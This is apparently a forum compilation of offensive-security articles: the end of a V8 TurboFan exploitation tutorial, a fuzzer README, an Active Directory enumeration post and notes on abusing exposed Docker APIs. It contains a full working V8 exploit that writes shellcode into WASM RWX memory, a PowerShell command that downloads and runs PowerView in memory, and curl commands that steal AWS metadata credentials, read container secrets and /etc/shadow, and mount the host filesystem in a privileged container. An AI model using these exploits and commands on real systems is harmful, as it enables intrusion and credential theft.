0x00002fac7911ecf0 0x00000cdfc0082ad1 FEEDBACK_METADATA_TYPE 0x00002fac7911ecf8 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911ed00 0x000000000000004f 52417812098225 d8> %DumpObjects(0x00002fac7911eb29,41) ----- [ WASM_INSTANCE_TYPE : 0x118 : REFERENCES RWX MEMORY] ----- 0x00002fac7911eb28 0x00001024ebc89411 MAP_TYPE 0x00002fac7911eb30 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911eb38 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911eb40 0x00002073d820bac1 WASM_MODULE_TYPE 0x00002fac7911eb48 0x00002073d820bcf1 JS_OBJECT_TYPE 0x00002fac7911eb50 0x00002fac79101741 NATIVE_CONTEXT_TYPE 0x00002fac7911eb58 0x00002fac7911ec59 WASM_MEMORY_TYPE 0x00002fac7911eb60 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb68 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb70 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb78 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb80 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb88 0x00002073d820bc79 FIXED_ARRAY_TYPE 0x00002fac7911eb90 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eb98 0x00002073d820bc69 FOREIGN_TYPE 0x00002fac7911eba0 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911eba8 0x00000cdfc00804c9 ODDBALL_TYPE 0x00002fac7911ebb0 0x00000cdfc00801d1 ODDBALL_TYPE 0x00002fac7911ebb8 0x00002dc289f94d21 CODE_TYPE 0x00002fac7911ebc0 0x0000000000000000 0x00002fac7911ebc8 0x00007f9f9cf60000 0x00002fac7911ebd0 0x0000000000010000 0x00002fac7911ebd8 0x000000000000ffff 0x00002fac7911ebe0 0x0000556b3a3e0c00 0x00002fac7911ebe8 0x0000556b3a3ea630 0x00002fac7911ebf0 0x0000556b3a3ea620 0x00002fac7911ebf8 0x0000556b3a47c210 0x00002fac7911ec00 0x0000000000000000 0x00002fac7911ec08 0x0000556b3a47c230 0x00002fac7911ec10 0x0000000000000000 0x00002fac7911ec18 0x0000000000000000 0x00002fac7911ec20 0x0000087e7c50a000 JumpTableStart [RWX] 0x00002fac7911ec28 0x0000556b3a47c250 0x00002fac7911ec30 0x0000556b3a47afa0 0x00002fac7911ec38 0x0000556b3a47afc0 ----- [ TUPLE2_TYPE : 0x18 ] ----- 0x00002fac7911ec40 0x00000cdfc00827c9 MAP_TYPE 0x00002fac7911ec48 
0x00002fac7911eb29 WASM_INSTANCE_TYPE 0x00002fac7911ec50 0x00002073d820b849 JS_FUNCTION_TYPE ----- [ WASM_MEMORY_TYPE : 0x30 ] ----- 0x00002fac7911ec58 0x00001024ebc89e11 MAP_TYPE 0x00002fac7911ec60 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 0x00002fac7911ec68 0x00000cdfc0080c19 FIXED_ARRAY_TYPE 52417812097833 That gives us the following offsets: let WasmOffsets = { shared_function_info : 3, wasm_exported_function_data : 1, wasm_instance : 2, jump_table_start : 31 }; Now simply find the JumpTableStart pointer and modify your crafted ArrayBuffer to overwrite this memory and copy your shellcode in it. Of course, you may want to backup the memory before so as to restore it after! Full exploit The full exploit looks like this: // spawn gnome calculator let shellcode = [0xe8, 0x00, 0x00, 0x00, 0x00, 0x41, 0x59, 0x49, 0x81, 0xe9, 0x05, 0x00, 0x00, 0x00, 0xb8, 0x01, 0x01, 0x00, 0x00, 0xbf, 0x6b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb1, 0x61, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x20, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0xb8, 0x51, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x49, 0x8d, 0xb9, 0x62, 0x00, 0x00, 0x00, 0xb8, 0xa1, 0x00, 0x00, 0x00, 0x0f, 0x05, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0x49, 0x8d, 0xb9, 0x64, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x48, 0x89, 0xe6, 0x49, 0x8d, 0x91, 0x7e, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x52, 0x48, 0x89, 0xe2, 0x0f, 0x05, 0xeb, 0xfe, 0x2e, 0x2e, 0x00, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x67, 0x6e, 0x6f, 0x6d, 0x65, 0x2d, 0x63, 0x61, 0x6c, 0x63, 0x75, 0x6c, 0x61, 0x74, 0x6f, 0x72, 0x00, 0x44, 0x49, 0x53, 0x50, 0x4c, 0x41, 0x59, 0x3d, 0x3a, 0x30, 0x00]; let WasmOffsets = { shared_function_info : 3, wasm_exported_function_data : 1, wasm_instance : 2, jump_table_start : 31 }; let log = this.print; let ab = new ArrayBuffer(8); let fv = new Float64Array(ab); let dv = new BigUint64Array(ab); let f2i = (f) => { fv[0] = f; return dv[0]; } let i2f = (i) => { dv[0] = BigInt(i); return fv[0]; } let tagFloat = (f) => { fv[0] = f; dv[0] += 1n; return fv[0]; } let 
hexprintablei = (i) => {
  return (i).toString(16).padStart(16,"0");
}

let assert = (l,r,m) => {
  if (l != r) {
    log(hexprintablei(l) + " != " + hexprintablei(r));
    log(m);
    throw "failed assert";
  }
  return true;
}

let NEW_LENGTHSMI = 0x64;
let NEW_LENGTH64 = 0x0000006400000000;
let AB_LENGTH = 0x100;
let MARK1SMI = 0x13;
let MARK2SMI = 0x37;
let MARK1 = 0x0000001300000000;
let MARK2 = 0x0000003700000000;
let ARRAYBUFFER_SIZE = 0x40;
let PTR_SIZE = 8;

let opt_me = (x) => {
  let MAGIC = 1.1; // don't move out of scope
  let arr = new Array(MAGIC,MAGIC,MAGIC);
  arr2 = Array.of(1.2); // allows to put the JSArray *before* the fixed arrays
  evil_ab = new ArrayBuffer(AB_LENGTH);
  packed_elements_array = Array.of(MARK1SMI,Math,MARK2SMI, get_pwnd);
  let y = (x == "foo") ? 4503599627370495 : 4503599627370493;
  let z = 2 + y + y ; // 2 + 4503599627370495 * 2 = 9007199254740992
  z = z + 1 + 1 + 1;
  z = z - (4503599627370495*2);
  // may trigger the OOB R/W
  let leak = arr[z];
  arr[z] = i2f(NEW_LENGTH64); // try to corrupt arr2.length
  // when leak == MAGIC, we are ready to exploit
  if (leak != MAGIC) {
    // [1] we should have corrupted arr2.length, we want to check it
    assert(f2i(leak), 0x0000000100000000, "bad layout for jsarray length corruption");
    assert(arr2.length, NEW_LENGTHSMI);
    log("[+] corrupted JSArray's length");
    // [2] now read evil_ab ArrayBuffer structure to prepare our fake array buffer
    let ab_len_idx = arr2.indexOf(i2f(AB_LENGTH));
    // check if the memory layout is consistent
    assert(ab_len_idx != -1, true, "could not find array buffer");
    assert(Number(f2i(arr2[ab_len_idx + 1])) & 1, false);
    assert(Number(f2i(arr2[ab_len_idx + 1])) > 0x10000, true);
    assert(f2i(arr2[ab_len_idx + 2]), 2);
    let ibackingstore_ptr = f2i(arr2[ab_len_idx + 1]);
    let fbackingstore_ptr = arr2[ab_len_idx + 1];
    // copy the array buffer so as to prepare a good looking fake array buffer
    let view = new BigUint64Array(evil_ab);
    for (let i = 0; i < ARRAYBUFFER_SIZE / PTR_SIZE; ++i) {
      view[i] = f2i(arr2[ab_len_idx-3+i]);
    }
    log("[+] Found backingstore pointer : " + hexprintablei(ibackingstore_ptr));
    // [3] corrupt packed_elements_array to replace the pointer to the Math object
    // by a pointer to our fake object located in our evil_ab array buffer
    let magic_mark_idx = arr2.indexOf(i2f(MARK1));
    assert(magic_mark_idx != -1, true, "could not find object pointer mark");
    assert(f2i(arr2[magic_mark_idx+2]) == MARK2, true);
    arr2[magic_mark_idx+1] = tagFloat(fbackingstore_ptr);
    // [4] leak wasm function pointer
    let ftagged_wasm_func_ptr = arr2[magic_mark_idx+3]; // we want to read get_pwnd
    log("[+] wasm function pointer at 0x" + hexprintablei(f2i(ftagged_wasm_func_ptr)));
    view[4] = f2i(ftagged_wasm_func_ptr)-1n;
    // [5] use RW primitive to find WASM RWX memory
    let rw_view = new BigUint64Array(packed_elements_array[1]);
    let shared_function_info = rw_view[WasmOffsets.shared_function_info];
    view[4] = shared_function_info - 1n; // detag pointer
    rw_view = new BigUint64Array(packed_elements_array[1]);
    let wasm_exported_function_data = rw_view[WasmOffsets.wasm_exported_function_data];
    view[4] = wasm_exported_function_data - 1n; // detag
    rw_view = new BigUint64Array(packed_elements_array[1]);
    let wasm_instance = rw_view[WasmOffsets.wasm_instance];
    view[4] = wasm_instance - 1n; // detag
    rw_view = new BigUint64Array(packed_elements_array[1]);
    let jump_table_start = rw_view[WasmOffsets.jump_table_start]; // detag
    assert(jump_table_start > 0x10000n, true);
    assert(jump_table_start & 0xfffn, 0n); // should look like an aligned pointer
    log("[+] found RWX memory at 0x" + jump_table_start.toString(16));
    view[4] = jump_table_start;
    rw_view = new Uint8Array(packed_elements_array[1]);
    // [6] write shellcode in RWX memory
    for (let i = 0; i < shellcode.length; ++i) {
      rw_view[i] = shellcode[i];
    }
    // [7] PWND!
    let res = get_pwnd();
    print(res);
  }
  return leak;
}

(() => {
  assert(this.alert, undefined); // only v8 is supported
  assert(this.version().includes("7.3.0"), true); // only tested on version 7.3.0
  // exploit is the same for both windows and linux, only shellcodes have to be changed
  // architecture is expected to be 64 bits
})()

// needed for RWX memory
load("wasm.js");

opt_me("");
for (var i = 0; i < 0x10000; ++i) // trigger optimization
  opt_me("");
let res = opt_me("foo");

Conclusion
I hope you enjoyed this article, and thank you very much for reading. If you have any feedback or questions, just contact me on my twitter @__x86.
Special thanks to my friends 0vercl0k and yrp604 for their review!
Kudos to the awesome v8 team. You guys are doing amazing work!
Recommended reading
V8's TurboFan documentation
Benedikt Meurer's talks
Mathias Bynen's website
This article on ponyfoo
Vyacheslav Egorov's website
Samuel Groß's 2018 BlackHat talk on attacking client side JIT compilers
Andrea Biondo's write up on the Math.expm1 TurboFan bug
Jay Bosamiya's write up on the Math.expm1 TurboFan bug
Sursa: https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/
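The exploit above relies on several helpers that live in the article's repository and are not shown in this excerpt (log, tagFloat, WasmOffsets, shellcode, and the i2f/f2i conversions). As a sketch of the standard typed-array trick that i2f/f2i almost certainly use (this is an assumption, not the author's exact code), reinterpreting a double's bits as a 64-bit integer and back looks like this:

```javascript
// Hypothetical reimplementation of the i2f/f2i helpers used above:
// alias a Float64Array and a BigUint64Array over the same 8-byte buffer,
// so writing through one view and reading through the other reinterprets
// the raw IEEE-754 bits without any numeric conversion.
const conv_buf = new ArrayBuffer(8);
const conv_f64 = new Float64Array(conv_buf);
const conv_u64 = new BigUint64Array(conv_buf);

function f2i(f) {         // double -> BigInt bit pattern
  conv_f64[0] = f;
  return conv_u64[0];
}

function i2f(i) {         // BigInt bit pattern -> double
  conv_u64[0] = BigInt(i);
  return conv_f64[0];
}
```

For instance, f2i(1.0) yields 0x3ff0000000000000n, the IEEE-754 encoding of 1.0, which is exactly the kind of value the OOB read above leaks as a "float".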
-
Baresifter
Baresifter is a 64-bit x86 instruction set fuzzer modeled after Sandsifter. In contrast to Sandsifter, Baresifter is intended to run bare-metal without any operating system. When loaded, the main fuzzing logic runs in ring0 as a tiny kernel. To safely execute arbitrary instructions, baresifter creates a single executable page in ring3 user space. For every instruction candidate, baresifter writes the instruction bytes to this user space page and attempts to execute it by exiting to user space. It follows the same algorithm as outlined in the original Sandsifter paper to find interesting instructions and guess instruction length.
Building and running
The build is currently tested on Fedora 29. The build requirements are clang++ 5.0 or later, scons, and qemu with KVM support (for easy testing). To start the build, execute scons. Baresifter can be run in KVM with ./run.sh and will output its results to the console. To run baresifter bare-metal, use either grub or syslinux and boot baresifter.elf32 as a multiboot kernel. It will dump instruction traces on the serial port. The serial port is hardcoded, so you might need to change that: git grep serial_output.
Interpreting results
Baresifter outputs data in a tabular format that looks like:
E <exc> O <capstone-instruction-id> <status> | <instruction hex bytes>
exc is the CPU exception that was triggered when baresifter tried to execute the instruction. Exception 1 (#DB) indicates that an instruction was successfully executed. The capstone-instruction-id is an integer that represents the instruction that Capstone decoded. A zero in this field means that Capstone could not decode the instruction. status is currently one of BUG (indicating a Capstone bug), UNKN (indicating an undocumented instruction), or OK (nothing interesting was found).
A concrete example looks like this:
E 0E O 0008 OK   | 00 14 6D 00 00 00 00
E 01 O 0000 UNKN | 0F 0D 3E
E 01 O 010A BUG  | 66 E9 00 00 00 00
The first line is an instruction that decoded successfully and generated a page fault when executing (exception 0xE). Capstone knows this instruction. The second line is an undocumented instruction, i.e. the CPU executed it successfully (or at least didn't throw an undefined opcode exception), but Capstone has no idea what it is. The third line is a Capstone bug: here the CPU and Capstone both decoded an instruction, and the CPU was able to execute it, but Capstone and the CPU disagree on the length of that instruction.
Sursa: https://github.com/blitz/baresifter
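The trace format described above is easy to post-process. A minimal sketch (my own illustration, not part of the project) that parses one trace line into its fields might look like:

```python
# Hypothetical parser for the baresifter trace format described above:
# "E <exc> O <capstone-instruction-id> <status> | <instruction hex bytes>"

def parse_trace_line(line):
    head, _, hexbytes = line.partition("|")
    fields = head.split()
    # fields: ["E", exc, "O", capstone_id, status]
    return {
        "exception": int(fields[1], 16),
        "capstone_id": int(fields[3], 16),
        "status": fields[4],
        "bytes": bytes.fromhex(hexbytes.replace(" ", "")),
    }

entry = parse_trace_line("E 01 O 0000 UNKN | 0F 0D 3E")
print(entry["status"], entry["bytes"].hex())  # e.g. keep only UNKN entries
```

Filtering a full trace for status UNKN then gives the candidate undocumented instructions to investigate.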
-
On the next offense, I'm banning both of you.
-
Active Directory Penetration Dojo – AD Environment Enumeration -1
Hi everyone, we've discussed the basics of Active Directory and the different servers in AD in previous blog posts of this series. If you've not yet read those, please find them here in Part 1 and Part 2. We've also covered trust relationships in an AD environment; you can read the post on trust relationships here. Let's have a look at the current post, in which we'll discuss how to enumerate an Active Directory domain and map the various entities, trusts, relationships and privileges in it.
A few things to understand:
LDAP is used by Active Directory as its access protocol. So when you enumerate information from AD, your query is sent to it as an LDAP query.
AD relies on DNS as its locator service, which enables clients to locate domain controllers and other hosts in the domain through DNS queries.
The AD database is NTDS.DIT.
AD supports several naming conventions, like:
User Principal Name: winsaafman@scriptdotsh.local
DN (Distinguished Name) LDAP names:
CN = Common Name
OU = Organisational Unit
DC = Domain Component
For example: CN=winsaafman,DC=corp,DC=scriptdotsh,DC=local
Any standard domain user can enumerate Active Directory information. There is no need for administrative rights (not even local administrator).
We'll be using PowerShell a lot in the enumeration stage. In PowerShell, you get a warning when running scripts because of the execution policy setting. Execution Policy is just a way to stop users from accidentally executing scripts. It is not really a security control, because it has built-in bypass parameters.
(powershell -ExecutionPolicy bypass) as you can see in the screenshot below:
If you don't want to save the PowerShell module on disk and would rather load it directly into memory and run one of its commands, you can do it like this:
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Get-NetDomain”
Besides -exec Bypass, there are several other ways to evade PowerShell blocking, which are already documented on the internet, so I won't talk much about that.
We can use ADSI, .NET classes, DSquery, PowerShell frameworks, CMD, WMI, the AD module etc. for enumerating Active Directory. In the current blog post, we'll enumerate the domain using the Active Directory PowerShell module and PowerView.
In the discovery phase, we have to analyse many things about the client environment and locate their PII, network architecture, devices, critical business applications etc. Then we find threats to those critical assets and look for misconfigurations, vulnerabilities and weaknesses.
Full article: https://scriptdotsh.com/index.php/2019/01/01/active-directory-penetration-dojo-ad-environment-enumeration-1/
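To make the naming conventions above concrete, here is a small illustration (mine, not from the original post; it ignores escaped commas that real DNs may contain) of splitting a distinguished name into its components:

```python
# Hypothetical helper: split an LDAP distinguished name (DN) into its
# attribute/value pairs (CN, OU, DC components) and rebuild the DNS-style
# domain name from the DC components.

def parse_dn(dn):
    parts = [p.split("=", 1) for p in dn.split(",")]
    return [(attr.strip(), value.strip()) for attr, value in parts]

def domain_from_dn(dn):
    # join the DC components back into a DNS-style domain name
    return ".".join(v for a, v in parse_dn(dn) if a.upper() == "DC")

print(domain_from_dn("CN=winsaafman,DC=corp,DC=scriptdotsh,DC=local"))
```

Running this on the example DN from the post yields the domain corp.scriptdotsh.local, which is the same name DNS-based locator queries would use.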
-
Abusing Docker API | Socket
CG / 8:32 AM
Notes on abusing open Docker sockets. This won't cover breaking out of Docker containers.
Ports: usually 2375 & 2376, but can be anything.
Refs:
https://blog.sourcerer.io/a-crash-course-on-docker-learn-to-swim-with-the-big-fish-6ff25e8958b0
https://www.slideshare.net/BorgHan/hacking-docker-the-easy-way
https://blog.secureideas.com/2018/05/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-1.html
https://blog.secureideas.com/2018/08/escaping-the-whale-things-you-probably-shouldnt-do-with-docker-part-2.html
https://infoslack.com/devops/exploring-docker-remote-api
https://www.blackhat.com/docs/us-17/thursday/us-17-Cherny-Well-That-Escalated-Quickly-How-Abusing-The-Docker-API-Led-To-Remote-Code-Execution-Same-Origin-Bypass-And-Persistence_wp.pdf
https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/
https://cert.litnet.lt/2016/11/owning-system-through-an-exposed-docker-engine/
https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124
https://www.exploit-db.com/exploits/42356
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/docker_daemon_tcp.rb
http://blog.nibblesec.org/2014/09/abusing-dockers-remote-apis.html
https://www.prodefence.org/knock-knock-docker-will-you-let-me-in-open-api-abuse-in-docker-containers/
https://blog.ropnop.com/plundering-docker-images/
Enable docker socket (create practice locations):
https://success.docker.com/article/how-do-i-enable-the-remote-api-for-dockerd
Having the Docker API / socket exposed is essentially granting root to any of the containers on the system. The daemon listens on unix:///var/run/docker.sock, but you can bind Docker to another host/port or a Unix socket. The docker socket is the socket the Docker daemon listens on by default, and it can be used to communicate with the daemon from within a container or, if configured, from outside the container against the host running Docker.
All the docker socket magic happens via the docker API. For example, if we wanted to spin up an nginx container, we'd do the below.

Create a nginx container
The following command uses curl to send the {"Image":"nginx"} payload to the /containers/create endpoint of the Docker daemon through the unix socket. This will create a container based on Nginx and return its ID.
$ curl -XPOST --unix-socket /var/run/docker.sock -d '{"Image":"nginx"}' -H 'Content-Type: application/json' http://localhost/containers/create
{"Id":"fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65","Warnings":null}

Start the container
$ curl -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/fcb65c6147efb862d5ea3a2ef20e793c52f0fafa3eb04e4292cb4784c5777d65/start

As mentioned above, you can also have the docker socket listen on a TCP port. You can validate that it's Docker by hitting it with a version request:
$ curl -s http://open.docker.socket:2375/version | jq
{
  "Version": "1.13.1",
  "ApiVersion": "1.26",
  "MinAPIVersion": "1.12",
  "GitCommit": "07f3374/1.13.1",
  "GoVersion": "go1.9.4",
  "Os": "linux",
  "Arch": "amd64",
  "KernelVersion": "3.10.0-514.26.2.el7.x86_64",
  "BuildTime": "2018-12-07T16:13:51.683697055+00:00",
  "PkgVersion": "docker-1.13.1-88.git07f3374.el7.centos.x86_64"
}

or with the docker client:
docker -H open.docker.socket:2375 version
Server:
 Engine:
  Version: 1.13.1
  API version: 1.26 (minimum version 1.12)
  Go version: go1.9.4
  Git commit: 07f3374/1.13.1
  Built: Fri Dec 7 16:13:51 2018
  OS/Arch: linux/amd64
  Experimental: false

This is basically a shell into the container.

Get a list of running containers with the ps command:
docker -H open.docker.socket:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
72cd30d28e5c gogs/gogs "/app/gogs/docker/st…" 5 days ago Up 5 days 0.0.0.0:3000->3000/tcp, 0.0.0.0:10022->22/tcp gogs
b522a9034b30 jdk1.8 "/bin/bash" 5 days ago Up 5 days myjdk8
0f5947860c17 centos/mysql-57-centos7 "container-entrypoin…" 8 days ago Up 8 days 0.0.0.0:3306->3306/tcp mysql
3965c004c7a7 192.168.32.134:5000/tensquare_config:1.0-SNAPSHOT "java -jar /app.jar" 8 days ago Up 8 days 0.0.0.0:12000->12000/tcp config
3f466b754971 42cb59080921 "/bin/bash" 8 days ago Up 8 days jdk8
6499013fdc2d registry "/entrypoint.sh /etc…" 8 days ago Up 8 days 0.0.0.0:5000->5000/tcp registry

Exec into one of the containers:
docker -H open.docker.socket:2375 exec -it mysql /bin/bash
bash-4.2$ whoami
mysql

Other commands
Are there some stopped containers?
docker -H open.docker.socket:2375 ps -a

What are the images pulled on the host machine?
docker -H open.docker.socket:2375 images

I've frequently not been able to get the docker client to work well when it comes to the exec command, but you can still get code exec in the container with the API. The example below uses curl to interact with the API over https (if enabled): create an exec job, set up the variable to receive the output, and then start the exec so you can get the output.

Using curl to hit the API
Sometimes you'll see 2376 up for the TLS endpoint. I haven't been able to connect to it with the docker client, but you can hit the docker API with curl no problem.

Docker socket to metadata URL
https://docs.docker.com/engine/api/v1.37/#operation/ContainerExec
Below is an example of hitting the internal AWS metadata URL and getting the output.

List containers:
curl --insecure https://tls-opendocker.socket:2376/containers/json | jq
[
 {
  "Id": "f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668",
  "Names": [ "/docker_snip_1" ],
  "Image": "dotnetify",
  "ImageID": "sha256:23b66a91f928ea6a49bce1be4eabedbafd41c5dfa4e76c1a94062590e54550ca",
  "Command": "cmd /S /C 'dotnet netify-temp.dll'",
  "Created": 1541018555,
  "Ports": [ { "IP": "0.0.0.0", "PrivatePort": 443, "PublicPort": 50278,
---SNIP---

List processes in a container:
curl --insecure https://tls-opendocker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
{
 "Processes": [
  [ "smss.exe", "7868", "00:00:00.062", "225.3kB" ],
  [ "csrss.exe", "10980", "00:00:00.859", "421.9kB" ],
  [ "wininit.exe", "10536", "00:00:00.078", "606.2kB" ],
  [ "services.exe", "10768", "00:00:00.687", "1.208MB" ],
  [ "lsass.exe", "10416", "00:00:36.000", "4.325MB" ],
---SNIP---

Set up an exec job to hit the metadata URL:
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'
{"Id":"4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55"}

Get the output:
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
{
 "Code" : "Success",
 "LastUpdated" : "2019-01-29T20:12:58Z",
 "Type" : "AWS-HMAC",
 "AccessKeyId" : "ASIATRSNIP",
 "SecretAccessKey" : "CD6/h/egYHmYUSNIPSNIPSNIPSNIPSNIP",
 "Token" : "FQoGZXIvYXdzEB4aDCQSM0rRV/SNIPSNIPSNIP",
 "Expiration" : "2019-01-30T02:43:34Z"
}

Docker secrets
Relevant reading: https://docs.docker.com/engine/swarm/secrets/

List secrets (no secrets / swarm not set up):
curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
{ "message": "This node is not a swarm manager. Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again."}

List secrets (they exist):
$ curl -s --insecure https://tls-opendocker.socket:2376/secrets | jq
[
 {
  "ID": "9h3useaicj3tr465ejg2koud5",
  "Version": { "Index": 21 },
  "CreatedAt": "2018-07-06T10:19:50.677702428Z",
  "UpdatedAt": "2018-07-06T10:19:50.677702428Z",
  "Spec": { "Name": "registry-key.key", "Labels": {} }},

Check what is mounted:
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "mount"]}'
{"Id":"7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa"}

Get the output by starting the exec:
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/7fe5c7d9c2c56c2b2e6c6a1efe1c757a6da1cd045d9b328ea9512101f72e43aa/start -d '{}'
overlay on / type overlay
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
---SNIP---
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
/dev/sda2 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro,data=ordered)
/dev/sda2 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro,data=ordered)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda2 on /var/lib/registry type ext4 (rw,relatime,errors=remount-ro,data=ordered)
tmpfs on /run/secrets/registry-cert.crt type tmpfs (ro,relatime)
tmpfs on /run/secrets/htpasswd type tmpfs (ro,relatime)
tmpfs on /run/secrets/registry-key.key type tmpfs (ro,relatime)
---SNIP---

Cat the mounted secret:
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/e280bd8c8feaa1f2c82cabbfa16b823f4dd42583035390a00ae4dce44ffc7439/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /run/secrets/registry-key.key"]}'
{"Id":"3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30"}

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/3a11aeaf81b7f343e7f4ddabb409ad1eb6024141a2cfd409e5e56b4f221a7c30/start -d '{}'
-----BEGIN RSA PRIVATE KEY-----
MIIJKAIBAAKCAgEA1A/ptrezfxUlupPgKd/kAki4UlKSfMGVjD6GnJyqS0ySHiz0
---SNIP---

If you have secrets, it's also worth checking out services, in case they are adding secrets via environment variables:
curl -s --insecure https://tls-opendocker.socket:2376/services | jq
[{
 "ID": "amxjs243dzmlc8vgukxdsx57y",
 "Version": { "Index": 6417 },
 "CreatedAt": "2018-04-16T19:51:20.489851317Z",
 "UpdatedAt": "2018-12-07T13:44:36.6869673Z",
 "Spec": {
  "Name": "app_REMOVED",
  "Labels": {},
  "TaskTemplate": {
   "ContainerSpec": {
    "Image": "dpage/pgadmin4:latest@sha256:5b8631d35db5514d173ad2051e6fc6761b4be6c666105f968894509c5255c739",
    "Env": [
     "PGADMIN_DEFAULT_EMAIL=REMOVED@gmail.com",
     "PGADMIN_DEFAULT_PASSWORD=REMOVED"
    ],
    "Isolation": "default"

Creating a container that has mounted the host file system:
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/create?name=test -d '{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}'
{"Id":"0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192","Warnings":null}

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/start?name=test

Read something from the host:
curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "cat /mnt/etc/shadow"]}'
{"Id":"140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6"}

curl --insecure -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/exec/140e09471b157aa222a5c8783028524540ab5a55713cbfcb195e6d5e9d8079c6/start -d '{}'
root:$6$THEPASSWORDHASHWUZHERE:17717:0:99999:7:::
daemon:*:17001:0:99999:7:::
bin:*:17001:0:99999:7:::
sys:*:17001:0:99999:7:::
sync:*:17001:0:99999:7:::
games:*:17001:0:99999:7:::

Cleanup
Stop the container:
curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/0f7b010f8db33e6abcfd5595fa2a38afd960a3690f2010282117b72b08e3e192/stop

Delete stopped containers:
curl --insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune

Sursa: https://carnal0wnage.attackresearch.com/2019/02/abusing-docker-api-socket.html
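The create/start sequence driven by curl above can also be scripted. A minimal sketch (my own, assuming only the /containers/create endpoint shape shown above) that builds the raw HTTP request curl sends over the unix socket:

```python
import json

# Hypothetical helper: build the raw HTTP/1.1 request that curl sends to
# /containers/create over the docker unix socket. The Host header value is
# arbitrary for unix-socket transport, but HTTP/1.1 requires one.
def build_create_request(image):
    body = json.dumps({"Image": image})
    return (
        "POST /containers/create HTTP/1.1\r\n"
        "Host: localhost\r\n"
        "Content-Type: application/json\r\n"
        f"Content-Length: {len(body)}\r\n"
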